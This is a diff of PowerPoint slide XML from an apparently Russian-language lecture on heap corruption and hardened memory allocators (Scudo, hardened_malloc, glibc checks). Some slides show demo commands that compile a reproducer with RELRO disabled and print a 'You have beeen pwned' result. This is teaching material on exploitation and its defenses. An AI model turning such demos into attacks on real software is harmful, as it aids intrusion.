                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>$ ./</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>a.out</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
+              <a:t>malloc(): corrupted top size</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -13859,21 +15116,37 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>malloc(): corrupted top size</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
               <a:t>Aborted</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73828C03-E24A-40DB-8882-B30BC1B15046}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>46</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -14343,33 +15616,8 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>$ </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>gcc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -O2 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>repro.c</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
+              <a:t>$ gcc -O2 repro.c</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -14512,6 +15760,35 @@
               </a:rPr>
               <a:t>Aborted</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B7E657-C2DD-4B18-92C5-4C77566598F4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>47</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -14593,7 +15870,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -14614,21 +15891,10 @@
             </a:r>
           </a:p>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Scudo</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Чексуммы для обнаружения перезаписи метаданных</a:t>
+              <a:t>Метаданные физически отделены от аллоцируемой памяти (нет "хедеров")</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -14642,6 +15908,21 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Чексуммы и</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или канарейки для обнаружения перезаписи метаданных</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Карантин </a:t>
             </a:r>
             <a:r>
@@ -14656,115 +15937,38 @@
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>M</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>map-only (нет `sbrk(2)`, для рандомизации)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>hardened_malloc:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Метаданные физически отделены от аллоцируемой памяти (нет "хедеров")</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рандомизация адресов внутри блоков</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Карантин</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Зануление данных на `free` и проверка на `malloc`</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Канарейки</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>M</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>map-only (нет `sbrk(2)`, для рандомизации)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Glibc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Po</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>inter encryption </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>XOR всех указателей на функции с канарейкой</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Дополнительные проверки heap consistency</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>(функция mcheck)</a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Зануление данных на free и проверка на malloc</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9490AAD4-7CB8-4932-817B-58AC6A72D902}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>48</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -14894,6 +16098,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D8BAC52-9455-4F11-8987-CFAA80FF0536}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>49</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -14992,15 +16225,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Shacham</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
+              <a:t> Shacham, </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -15070,6 +16295,35 @@
           </a:prstGeom>
         </p:spPr>
       </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D84FA8-A3B3-4204-A487-67C4EFA58336}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>5</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -15173,7 +16427,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LD_PRELOAD=path/to/new/allocator.so</a:t>
+              <a:t>LD_PRELOAD=path/to/allocator.so</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -15332,6 +16586,35 @@
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A5120B-FAAA-4EA3-9261-D059D90B41ED}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>50</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -15422,6 +16705,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E1524F5-F5A2-4DDC-86BD-B2871C0190CD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>51</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -15598,6 +16910,35 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Инициализировать содержимое таблицы на старте программы и сразу пометить сегмент как readonly</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3685452-5AAD-4F57-A77A-2D613136BE8B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>52</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -16125,21 +17466,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>$ for </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> in `seq 0 16`; do</a:t>
+              <a:t>$ for i in `seq 0 16`; do</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -16152,70 +17479,55 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>    </a:t>
+              <a:t>    gcc -Wl,-</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>gcc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
+              <a:t>z,norelro</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>,-</a:t>
+              <a:t>repro.c</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -DPOS=$i</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>    ./</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>z,norelro</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>repro.c</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -DPOS=$</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
+              <a:t>a.out</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
@@ -16232,19 +17544,8 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>    ./</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>a.out</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
+              <a:t>    i=$((i + 1))</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -16256,35 +17557,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>    </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=$((</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> + 1))</a:t>
+              <a:t>  done</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -16297,7 +17570,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  done</a:t>
+              <a:t>  Segmentation fault</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -16332,12 +17605,37 @@
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  Segmentation fault</a:t>
-            </a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  You have </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>beeen</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>pwned</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" b="1" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -16345,37 +17643,12 @@
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  You have </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>beeen</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0" err="1">
